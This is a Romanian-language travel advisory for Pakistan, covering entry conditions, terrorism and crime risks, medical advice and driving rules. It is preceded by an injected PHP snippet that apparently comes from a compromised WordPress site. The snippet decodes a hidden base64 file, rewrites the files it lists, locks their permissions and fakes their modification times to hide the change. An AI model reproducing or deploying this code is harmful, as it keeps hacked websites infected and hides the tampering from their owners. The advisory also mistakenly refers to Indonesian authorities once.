$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Pakistan – O noua atitudine

Condiţii de intare şi regim de şedere

Pentru cetăţenii români care se deplasează în Pakistan este necesară obţinerea vizei de intrare.
Autorităţile locale nu eliberează vize la frontieră, motiv pentru care vizele trebuie obţinute de la Ambasada Pakistanului la Bucureşti.

Condiţiile de intrare în Pakistan sunt următoarele:

  • deţinerea unui paşaport valabil.
  • deţinerea documentelor de călătorie care certifică scopul deplasării în Pakistan.
  • deţinerea în paşaport a unei vize valabile.
  • asigurare medicală valabilă pe perioada prezenţei în Pakistan.

Este indicat ca intrarea în Pakistan să se realizeze numai prin Porţile Karachi şi Lahore din aeroportul din Islamabad.

Pe întreaga durată a şederii în Pakistan, cetăţenii români sunt sfătuiţi să menţină un contact permanent cu Ambasada României la Islamabad.
Adresa House nr. 13, strada 88, sector G6/3;
Tel: 00 92 51 2826514, fax: 00 92 51 2826515

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Autorităţile de la Islamabad depun eforturi susţinute pentru crearea unui mediu de securitate funcţional, fiind adoptate o serie de măsuri menite să asigure controlarea elementelor de sorginte teroristă şi instaurarea unei stări de stabilitate politico-socială.

În pofida acţiunilor de prevenire şi contracarare a unor fenomene de natură teroristă, întreprinse de administraţia de la Islamabad, situaţia existentă în Pakistan nu oferă, deocamdată, cadrul desfăşurării unor vizite, mai ales în scop turistic, în condiţii de securitate.

Tensionarea relaţiilor politice între autorităţile centrale de la Islamabad şi liderii structurilor tribale din provincia Baluchistan, cu implicaţii inclusiv pe linie militară – confruntări frecvente, atentatele cu bombă din Karachi – oraş industrializat, cu o mare prezenţă străină, precum şi ciocnirile armate din Waziristan – între trupele militare federale şi elemente de factură teroristă, concentrate de-a lungul graniţei cu Afganistanul, sunt factori care contribuie în mod direct la menţinerea unei stării de insecuritate în Pakistan.

Cetăţenilor români care călătoresc în Pakistan li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile indoneziene şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).

 

Siguranţă şi criminalitate

În orasele Islamabad, Lahore, Sialkot, Karachi şi Quetta au loc frecvente demonstraţii şi mitinguri, în majoritatea cazurilor cu exprimarea unor acte de violenţă şi tulburarea ordinii publice.
Se recomandă evitarea zonelor Aabpara, Jinnah Super, Melody Market, Super Market, Lal Masjid, Constitution Avenue, Serena Hotel, Zero Point şi sectoarele F7 şi G9 din capitala.
Cetatenii romani sunt sfătuiţi să evite deplasarea în Provincia Frontierei de Nord-Vest, în Kashmir şi în zonele învecinate din Provinciile Punjab şi Balochistan.
Ca urmare a stării de insecuritate din Pakistan, pe fondul atentatelor teroriste şi a atacurilor soldate cu numeroase victime, MAE recomandă cetăţenilor români să evite călătoriile în această ţară.

Cetăţenii români care se află pe teritoriul acestei ţări sunt sfătuiţi să respecte următoarele recomandări:

  • Să limiteze, pe cât posibil, perioada de şedere în Pakistan;
  • Să evite circulaţia pe timp de noapte şi deplasarea în zonele izolate ale ţării;
  • Să evite zonele aglomerate, în care se desfăşoară mitinguri, manifestaţii politice sau în care există concentrări masive de forţe de securitate şi să nu staţioneze în zonele din apropierea unor instituţii guvernamentale.
  • Să urmărească mass-media locală pentru a afla care sunt zonele în care se desfăşoară acţiuni de protest pentru a le putea evita.
  • Să păstreze în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi să nu le expună în mod vizibil asupra lor sau în maşini.
  • Să respecte cu stricteţe anunţurile şi recomandările autorităţilor locale.
  • Să respecte tradiţiile şi obiceiurile locale.
  • Persoanele de sex feminin să evite efectuarea unor vizite în Pakistan neînsoţite.
  • să se deplaseze, pe cât posibil, cu avionul,
  • Să se adreseze Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile pentru a obţine informaţii cu privire la tipurile de vaccinuri care trebuie efectuate;.

În cazul unor incidente care afectează integritatea fizică a persoanei sau a bunurilor proprietate personală, se recomandă contactarea celei mai apropiate secţii de poliţie, concomitent cu cea a misiunii diplomatice române.

 

Sistemul medical

Organizaţia Mondială a Sănătăţii avertizează asupra riscului răspândirii virusului de poliomielita în Europa. În prezent, Afganistan, India, Pakistan, Nigeria şi Tadjikistan sunt considerate ţări în care poliomielita este endemică.

În cazul în care nu pot face dovada că au fost imunizaţi cu o lună înainte de efectuarea deplasării, cetăţenii români care se deplasează în aceste ţări prin Turcia vor primi câte o doză de vaccin. În caz de refuz, pasagerii vor trebui să semneze o declaraţie care să ateste refuzul vaccinării.

Pentru informaţii cu privire la tipurile de vaccinuri care trebuie efectuate, vă recomandăm să vă adresaţi Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile.

 

Condiţii privind traficul auto

  • Circulaţia auto

În Pakistan, traficul auto se desfăşoară pe partea stângă a drumului.

  • Starea drumurilor

Stare generală a drumurilor şi infrastructurii este bună.

  • Permisul de conducere

Permisul de conducere românesc nu este valabil în Pakistan, însă pe baza acestuia, rezidenţii îl pot obţine pe cel pakistanez.
Există poliţie rutieră, recent constituită, prezenta în număr mare pe străzile capitalei.

Utilizarea cărţilor de credit

Utilizarea cărţilor de credit sau a altor modalităţi de plată se poate realiza la majoritatea băncilor. Sistemul plăţilor cu cardul este frecvent folosit pe piaţa pakistaneză.

By o9admin